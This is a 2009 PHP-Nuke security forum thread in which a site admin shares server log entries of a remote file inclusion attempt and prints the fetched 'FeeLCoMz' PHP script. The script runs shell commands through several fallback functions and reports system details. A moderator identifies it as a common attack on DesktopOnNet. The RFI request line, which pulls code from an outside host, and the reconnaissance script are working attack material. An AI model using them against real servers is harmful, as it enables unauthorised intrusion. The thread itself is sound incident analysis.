Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Nash
Regular
Regular


Joined: Jan 10, 2006
Posts: 93

PostPosted: Thu Jan 29, 2009 10:58 pm Reply with quote

Thought you all might be interested to see this attack I caught from browsing through my logs

Code:
Host: 74.55.113.50

 //applications/frontpage.don3app/frontpage.php?app_path=http://www.stormpages.com/birulangi/idbiru.txt???
 
 Http Code: 403
 Date: Jan 29 22:07:55
 Http Version: HTTP/1.1
 Size in Bytes: 282
 Referer: -
 Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4

Host: 74.55.113.50
 /modules.php%253Fname%253DNews%2526file%253Darticle%2526sid%253D70//applications/frontpage.don3app/frontpage.p
 
 Http Code: 403
 Date: Jan 29 22:07:55
 Http Version: HTTP/1.1
 Size in Bytes: 348
 Referer: -
 Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4


So, I went to check out what code lay at Only registered users can see links on this board! Get registered or login! Here it is:

Code:


<?php
//FeeLCoMz Response
$pwd1 =   @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =   @getenv("SERVER_SOFTWARE");
$php1 =   @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=   @diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =   ConvertBytes($all1-$free1);
$free =   ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

echo "FeeLCoMz".$sf."<br>";
echo "uname -a:   $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:   $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;
?>


I'm starting to parse through this, but does anyone recognize? Anyone familiar with FeelComz?

Thanks

_________________
--- Nash
--- RN 7.6 v 2.02
--- GTNG installed
--- IPB forum installed and modded for Nuke 
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Fri Jan 30, 2009 12:02 am Reply with quote

Yes, its a pretty standard remote file injection. FeeLCoMz is probably the hacker, but he didn't write the script. Just another script kiddie.

Looks to be an attack on a script: DesktopOnNet

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©